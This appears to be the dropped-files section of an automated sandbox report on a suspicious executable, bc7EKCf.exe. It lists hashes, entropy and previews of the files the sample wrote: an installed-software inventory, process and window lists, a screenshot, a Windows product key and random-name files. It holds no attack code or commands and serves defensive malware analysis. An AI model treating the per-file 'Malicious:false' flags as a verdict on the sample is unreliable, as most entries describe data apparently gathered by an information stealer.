                                                                                                                                                                                                                                                                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):282
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5191090305155277
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                                                                                                                                                                                  MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                                                                                                                                                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                                                                                                                                                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                                                                                                                                                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                                                                                                                                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                                                                                                                                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                                                                                                                                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                                                                                                                                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                                                                                                                                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                                                                                                                                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                                                                                                                                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                                                                                                                                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):504
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.514398793376306
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                                                                                                                                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                                                                                                                                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                                                                                                                                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                                                                                                                                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1455
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.413028828150352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:9J0fKqXJsK7fs2qdsK00fKqnsxPUCddBkfo1r5U9forNgAEfbr+fHeikQPUupsBR:96fKqXl7fs2qZHfKq0Pxdrkfmr6forrI
                                                                                                                                                                                                                                                                                                                  MD5:99F95B5A982DCF2C32257DF9252B297C
                                                                                                                                                                                                                                                                                                                  SHA1:48EF4BEAA0C039F54C4923E22B8B850A2D1E838A
                                                                                                                                                                                                                                                                                                                  SHA-256:93F541D741579DBCBF5B8E2E58471D89BC0DE9EE03F39197E6D042F0FA005DBB
                                                                                                                                                                                                                                                                                                                  SHA-512:AB4039D1E95FF6F7176BC0375579F4780E500CC68693AE0314E10C59B339676310440524B4C5EB46E40694F179985C3B2689F1A1002067D6900DF741E1BB53D4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 31/08/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}....APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 31/08/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}....APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 31/08/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}....APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 31/08/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}....APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 31/08/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}....APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 31/08/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):86092
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.852118529586262
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:CrPmU+oyiVAoUkXM5qyJ9Pw2k3YFh8BfCZb4hdGTkSVmXgF7H2KAYFTsq5knlmc:iPmU+oyi65qyI2kg8Md4hdGzoQFNTOld
                                                                                                                                                                                                                                                                                                                  MD5:4A0975C0364D20AD5283172DC6D8553D
                                                                                                                                                                                                                                                                                                                  SHA1:A4FC22A928FEAF416F1D138794F048CCD32C6455
                                                                                                                                                                                                                                                                                                                  SHA-256:A0DD021C881041AB35060CB9B4EF814A444DA2106D3D6E1F748321A7691468B8
                                                                                                                                                                                                                                                                                                                  SHA-512:DBC5464AA8F3DA66FE923B2FC14C36A0C7F3300D42C9864613D324B53A2768757328DF3C59C1740A1FC50EF9D69994AD214D6235C87CB0E3BF90B18DD9F0C9C7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):19775
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698242503541899
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:rx6kjClaWszZN0Fz4/xYttExwIzf6I4Eud9sE0XOAf0i4bo/h6KGU21Uv+OXjxjg:rx6kjClaWszZN0Fz4/6ttExwIzf6I4EW
                                                                                                                                                                                                                                                                                                                  MD5:9F750BEBFF9CBBBC737B668E1B4AAF82
                                                                                                                                                                                                                                                                                                                  SHA1:FC0A3A774B368C8DE8834397BD6932566B572B89
                                                                                                                                                                                                                                                                                                                  SHA-256:E950AA7F23037637A7F5C436C03280937227DF8E6F18AD637F71ADCD5DB1FAD8
                                                                                                                                                                                                                                                                                                                  SHA-512:DE6119F85D018B38C7B99E01C9DBB46A87E53A0631D2260095BA67577C679E744904585CA1E1467308FA70F3BBC33AB21BD53FEA41D9A3D443B796D4031A8304
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:NAME: fqpBYLzhtpPhchiprYod...PID: 6464...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: svchost...PID: 2152...EXE: C:\Windows\system32\svchost.exe....NAME: explorer...PID: 2580...EXE: C:\Windows\Explorer.EXE....NAME: svchost...PID: 7316...EXE: C:\Windows\System32\svchost.exe....NAME: fontdrvhost...PID: 784...EXE: C:\Windows\system32\fontdrvhost.exe....NAME: sppsvc...PID: 4296...EXE: Unknown....NAME: fqpBYLzhtpPhchiprYod...PID: 6448...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: smartscreen...PID: 5584...EXE: C:\Windows\System32\smartscreen.exe....NAME: svchost...PID: 1176...EXE: C:\Windows\system32\svchost.exe....NAME: svchost...PID: 6012...EXE: Unknown....NAME: csrss...PID: 408...EXE: Unknown....NAME: svchost...PID: 864...EXE: Unknown....NAME: svchost...PID: 1724...EXE: C:\Windows\System32\svchost.exe....NAME: sihost...PID: 3420...EXE: C:\Windows\system32\sihost.ex
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):31
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.821311940104173
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:TrYEm1IH7bt:YEmCl
                                                                                                                                                                                                                                                                                                                  MD5:D0E4F3891DEE32F746B6E720B59F04E3
                                                                                                                                                                                                                                                                                                                  SHA1:4983FD11E8DF73A83E29728E1C0A414A0B1EA07B
                                                                                                                                                                                                                                                                                                                  SHA-256:6C7FA4A764AA888939D2260C14E9D25FBC87AF4B867C6CCF97FFDE2347B197CA
                                                                                                                                                                                                                                                                                                                  SHA-512:D83B189499FE9CD4E4855D6F10B25F66F0573A945A19954B560817A615802B27AAFE5EB45E5A5F58E782D5EEED8A5C0200A5EEF4E04167154EA80C8D2AB60189
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DPJN2-J9CWC-Y3DCB-2J348-V2GQC-4
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):15184
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.676457066912129
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:IRjWjXlK1bkNws1+gEPtFaX5CJ3kodN/rRqms4+wrVPbrrjZLH6jIujmFJc0D4u8:IRjWjXlK1bkNV1+gEPtFaX5CJ3kodN/I
                                                                                                                                                                                                                                                                                                                  MD5:BE294E773D3CBA4E0150AB3B2B0FECF9
                                                                                                                                                                                                                                                                                                                  SHA1:2E350B7DDB060C02B6A7B20D06EB3AA0840F0AA4
                                                                                                                                                                                                                                                                                                                  SHA-256:8F891F72E24F02D7F25894B1E0417A851E0E1EF0AC7301889E2F27B714545302
                                                                                                                                                                                                                                                                                                                  SHA-512:CAF37B9AA7F505DC33EBAF62E36A2BE2478BAD1B0D8432EDB4D1BCBA626C1BB7B9514ED347FB1AE8F58C1C34F9AAF7C8FDF2EE170EA394D6F9546197D5C52AB3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6464...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6448...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6864...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6416...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6428...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCHGRsCKDQshwFImjnskWqVA\fqpBYLzhtpPhchiprYod.exe....NAME: fqpBYLzhtpPhchiprYod...TITLE: New Tab - Google Chrome...PID: 6848...EXE: C:\Program Files (x86)\JLOsYIXtAwisMTBlQkjcKCH
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y:Y
                                                                                                                                                                                                                                                                                                                  MD5:7F39F8317FBDB1988EF4C628EBA02591
                                                                                                                                                                                                                                                                                                                  SHA1:6C1E671F9AF5B46D9C1A52067BDF0E53685674F7
                                                                                                                                                                                                                                                                                                                  SHA-256:D029FA3A95E174A19934857F535EB9427D967218A36EA014B70AD704BC6C8D1C
                                                                                                                                                                                                                                                                                                                  SHA-512:00819BEDF0933E1D682112566D00541FA0EBCDBFDA053EE2399BB9D51DA4EA809B9CA4252ED318B0046FC43EF66853FF2872E2FD894BF371F6683A15BDAAEE74
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:61
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1307
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.338856420521287
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84hE8E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hb
                                                                                                                                                                                                                                                                                                                  MD5:D83D0962D4FB45421BC5F2E9BA163433
                                                                                                                                                                                                                                                                                                                  SHA1:AD7CA3BEEB1A15DE54B83DACA3C557DAFA2C37A7
                                                                                                                                                                                                                                                                                                                  SHA-256:0DCA64EDE8C1B8DA01A6512A43C7823E1F0C9DA07B582A19677394F11275BC51
                                                                                                                                                                                                                                                                                                                  SHA-512:69D113EEC2E060AD6C493E1F565A106D52DC1E09CFA733436308CD5FE91778B6DFD1679B65E16416AAD55750C46903F8DA0038F01EA7E28B30114386E9768F15
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8369
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792615708009978
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNwZ+FeiRUeh/ejfkYY6qRAq1k8SPxVLZ7VTiQ:fsNwyph/k8YY6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                                                  MD5:408057E025ECFBBA72AC2A7CDC2D2B37
                                                                                                                                                                                                                                                                                                                  SHA1:373F160D63ED9F4D11FEBA5A312247DAE4ABC087
                                                                                                                                                                                                                                                                                                                  SHA-256:5D3EFFCDFEC82A87B63120D1E292933F216E3AEFB465EAFCD9B91462504E063F
                                                                                                                                                                                                                                                                                                                  SHA-512:6F9DD20A7147E19A441D8EBB1CF5E39536764E6E0F358C2050B19AC3D840FC8CFC8E8014925798C76A512F8AB4BADDF8E047C861910D739BA282E3AD885BE3FF
                                                                                                                                                                                                                                                                                                                  Malicious:false
